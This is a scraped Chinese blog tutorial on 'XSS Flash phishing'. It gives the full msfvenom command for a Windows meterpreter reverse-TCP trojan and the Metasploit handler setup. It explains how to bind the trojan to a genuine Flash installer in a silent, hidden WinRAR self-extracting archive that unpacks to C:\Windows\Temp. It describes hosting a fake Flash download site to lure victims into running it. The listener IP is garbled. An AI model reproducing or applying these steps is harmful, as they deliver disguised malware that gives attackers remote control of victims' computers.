当前位置: 首页 > news >正文

xss-flash钓鱼

1.用kali中的msf生成一个payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.3.44 LPORT=4444 -f exe > shell.exe


运行完会在当前目录下生成一个shell.exe 文件 然后将其拖到你的物理机上 进行后续的伪装捆绑

2.kali中开启监听

上一步我们生成了一个可执行木马 现在我们要在kali 中开启该木马的监听

在kali 中依次输入以下语句

    msfconsole
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.1668.13.143
    set lport 4444
    run

 


3.伪装木马

因为我们要将木马伪装到flash的解压包中 所以我们先去flash下载一个真的flash安装包 下载链接在下面 

https://www.flash.cn/download-wins
下载完后我们就有两个文件 一个木马文件一个真的安装包

 


我们利用winRAR的自定义解压将两个文件合成一个可执行文件

(1)两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填
写解压路径为 C:\Windows\Temp




(2)点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...


(3)配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!!



然后我们就得到了两个文件合一起的可执行文件

4.搭建flash的网站并修改其下载文件

下载以下项⽬并将其源码⽂件部署在⽹站根⽬录下...稍作修改并访问




5.去搭建的网站下载我们的木马并运行


打开后kali就会反弹

 

 

 

 



 

相关文章:

  • 深入掌握Redis:从原理到实践的全方位指南
  • 【Linux-HTTP协议】HTTP知识延续+HTTP设计改进
  • 论坛系统测试报告
  • C++ std::vector 超详细指南:基础实践(手搓vector)
  • FFMPEG利用H264+AAC合成TS文件
  • 关于tresos Studio(EB)的MCAL配置之GPT
  • Netty笔记6:Netty组件
  • 剑指 Offer II 060. 出现频率最高的 k 个数字
  • [Redis] 终极缓存四连杀:缓存预热、缓存击穿、缓存穿透、缓存雪崩,真的懂了吗?
  • XHR请求解密:抓取动态生成数据的方法
  • 【django初学者项目】
  • Unity3D 布料模拟(Cloth Simulation)详解
  • 计算机网络(1) 网络通信基础,协议介绍,通信框架
  • 【杂谈】信创电脑华为w515(统信系统)登录锁定及忘记密码处理
  • JVM简单了解
  • Avalonia 打包成deb
  • Stream流的核心思想
  • 为AI聊天工具添加一个知识系统 之130 详细设计之71 通用编程语言 之1
  • MAUI(C#)安卓开发起步
  • #define GBB_DEPRECATED_MSG(msg) __declspec(deprecated(msg))
  • 和平会谈两天后,俄对乌发动冲突爆发以来最大规模无人机袭击
  • 看展 | 黄永玉新作展,感受赤子般的生命力
  • 香港特区政府强烈谴责美参议员恐吓国安人员
  • 菲律宾中期选举结果揭晓,马科斯与杜特尔特家族重回“权力的游戏”
  • 女排奥运冠军宋妮娜:青少年保持身心健康才能走得更远
  • 以军证实空袭也门多个港口